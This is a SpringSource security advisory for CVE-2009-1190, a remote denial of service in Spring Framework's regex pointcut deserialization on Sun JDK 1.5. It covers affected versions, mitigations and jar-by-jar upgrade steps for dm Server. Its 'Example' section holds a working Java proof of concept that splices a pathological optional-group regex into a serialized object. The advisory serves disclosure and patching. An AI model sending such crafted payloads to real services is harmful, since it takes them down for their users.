Spring Framework Known Vulnerabilities and Issues

22 April 2009: CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability

Severity: Low
Vendor: SpringSource
Versions Affected: Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2; dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6 JDK)

Description:

The j.u.r.Pattern.compile method in Sun 1.5 JDK has a problem ([1],[2]) with exponential compilation times, when using optional groups. A workaround [3] was implemented in 1.4.2_06 but the root cause of poor performance in regex processing was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]); via it's inherited readObject method (from AbstractRegexpMethodPointcut). When Sun JVM 1.5 driven application with spring.jar in its classpath accepts serializable data, an attacker could use a long regex string with many optional groups to consume enormous CPU resources. And, with a few requests all listeners will be occupied with compiling regex expressions forever.

Mitigation:

Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for the root cause
Spring Framework 2.5.6.SEC01 has been released for Community users that includes a workaround to the root cause - see the information at the end of this notice for the steps
Spring Framework 2.5.6.SR02 is available for Enterprise users that includes a workaround to the root cause; The software can be found in the Customer Portal here: http://www.springsource.com/spring_account
Disable functionality that accepts serializable data from untrusted sources
Spring Framework 3.0.0.M3 will be released shortly that includes a workaround to the root cause
dm Server 1.0.2 Community users may replace the Spring Framework 2.5.6 jar with 2.5.6.SEC01 - see the information at the end of this notice for the detailed steps
dm Server 1.0.3 that includes a workaround to the root cause will be released shortly
Instrumented Spring Framework 2.5.6.SR02 that includes a workaround to the root cause is available to Enterprise users. The software can be found in the Customer Portal here: http://www.springsource.com/spring_account

Example:

public class DoSSpring {

             static byte[] getSerialized(Object o) throws Exception {

              ByteArrayOutputStream baos = new ByteArrayOutputStream();

              ObjectOutputStream oos = new ObjectOutputStream(baos);

              oos.writeObject(o);

              oos.flush();

              oos.close();

              return baos.toByteArray();

             }

             public static void main(String[] a) throws Exception{

              String thePattern="(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)" + "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)" + "?(W)?(I)?(U)?(a)?$";

              String longerPattern = thePattern.substring(0,thePattern.length()-1)+thePattern;

              int length = longerPattern.length();

              String fakePattern = longerPattern.replaceAll(".", "A");

              JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();

              jrmp.setPattern(fakePattern);

              System.out.println(jrmp);

              byte[] theArray = getSerialized(jrmp);

              int i = 0;

              for (; i < theArray.length;i++) {

               if (((char)theArray[i])=='A' &&((char)theArray[i+1]=='A')) {

                break;

               }

              }

              System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);

              ByteArrayInputStream bis = new ByteArrayInputStream(theArray);

              ObjectInputStream ois = new ObjectInputStream(bis);

              Object o = ois.readObject();  // returns after a very very long time

             }

            }

Credit:

This issue was discovered by the RedHat Security Response Team

References:

[1] http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html

Spring Framework update steps:

backup your application
unzip the downloaded distribution and copy any Spring 2.5.6.SEC01 jars, that you are using as part of your application build, from dist or dist/modules directories to replace the current 2.5.6 jars in your build
rebuild and redeploy your application

dm Server update steps:

Prerequisites:

springsource-dm-server-1.0.2.RELEASE
spring-framework-2.5.6.SEC01

Note: For Enterprise customers of dm Server 1.0.2 who are using the instrumented Spring JARs - Instrumented Spring Framework 2.5.6.SR02 that includes a workaround to the root cause will be released by April 27, 2009

Update Steps:

In $DMS_HOME/lib
- Remove: org.springframework.core-2.5.6.A.jar
- Add: spring-core.jar
In $DMS_HOME/repository/bundles/ext
- Remove:
  org.springframework.aop-2.5.6.A.jar
  org.springframework.aspects-2.5.6.A.jar
  org.springframework.beans-2.5.6.A.jar
  org.springframework.context-2.5.6.A.jar
  org.springframework.context.support-2.5.6.A.jar
  org.springframework.core-2.5.6.A.jar
  org.springframework.jdbc-2.5.6.A.jar
  org.springframework.jms-2.5.6.A.jar
  org.springframework.orm-2.5.6.A.jar
  org.springframework.transaction-2.5.6.A.jar
  org.springframework.web-2.5.6.A.jar
  org.springframework.web-servlet-2.5.6.A.jar
- Add:
  spring-aop.jar
  spring-aspects.jar
  spring-beans.jar
  spring-context.jar
  spring-context-support.jar
  spring-core.jar
  spring-jdbc.jar
  spring-jms.jar
  spring-orm.jar
  spring-tx.jar
  spring-web.jar
  spring-webmvc.jar

In $DMS_HOME/repository/libraries/ext

Edit: org.springframework.spring-library-2.5.6.A.libd

==

                    Library-SymbolicName: org.springframework.spring

                    Library-Version: 2.5.6.SEC01

                    Library-Name: Spring Framework

                    Import-Bundle:

                    org.springframework.aop;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.aspects;version="[2.5.6.SEC01, 2.5.6.SEC01]";import-scope:=application, org.springframework.beans;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.context;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.context.support;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.core;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.jdbc;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.jms;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.orm;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.transaction;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.web;version="[2.5.6.SEC01, 2.5.6.SEC01]",  org.springframework.web.servlet;version="[2.5.6.SEC01, 2.5.6.SEC01]",  com.springsource.org.aopalliance;version="[1.0.0, 1.0.0]"

                    ==